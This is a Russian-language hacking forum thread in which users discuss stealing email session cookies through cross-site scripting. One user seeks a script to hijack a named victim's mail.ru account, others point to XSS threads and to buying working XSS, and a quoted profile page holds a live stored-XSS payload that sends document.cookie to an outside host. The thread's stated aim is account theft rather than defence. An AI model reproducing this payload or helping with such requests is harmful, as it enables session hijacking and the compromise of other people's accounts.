|
*Неактуально*
*Неактуально*
|
почитай про фейки и XSS
|
Ссылка должна быть на том же домене, от которого ты хочешь куку. Забрать куку от почты можно только если твой скрипт воровства куков будет на том же домене что и почтовый ящик. Читай про Cross Site Scripting (XSS)
|
Помогите пожалуйста написать такой скрипт, я сам не смогу. У меня и у жертвы ящик на mail.ru.
|
Digital111,
http://forum.antichat.ru/thread70397.html |
Нет, ну парень действительно прав, я считаю что многих интересует "ссылка крижи куки", я вот тоже многог статей2 обчитал, но везде только поверхностно говориться(((
ЗЫ: я новичек, где здесь находиться паблик (глянуть свежиt xss) |
в этих темах смотри:
http://forum.antichat.ru/thread88986.html http://forum.antichat.ru/thread35802.html но щас нету рабочих хсс, так что ищи сам или покупай... |
а вот смотри, допустим я нашол xss, вставил запрос куки на сниффер(скрипт), все пашед, потом етот баг прикріваеться(я напиример ету xxs выложил в паблик все уже о ней узнал и потом решили ее прикрыть) когда я в 1-й раз кинул скрипт, его тоже потом прикроют, а то я знаю 1 xss я не могу вкинуть скрипт , а кто то раньше кинул и он работает и ворует куки!
|
LemoTTT, даже ребенок понял какую х..ю ты сказал :(
|
Может ты норм ответиш?!
|
Вот тут внедрен скрипт которій крадет куки
http://jamber.info/profile/KISA_Anfisa.html как мне так сделать, если ничего не получаеться(( |
Цитата:
Код HTML:
<div style="font-size: 17px; font-weight: bold;">О себе:</div><br /> <div style="font-size: 12px;"> я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script> </div> <div id="about_editor" style="display: none;"><br /><br /> <textarea id="about_textarea" name="about_textarea" onkeyup="AboutEditor_MinChar();" style="width: 100%;">я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script></textarea><br /> <div align="center"> |
Цитата:
Цитата:
|
| Время: 03:04 |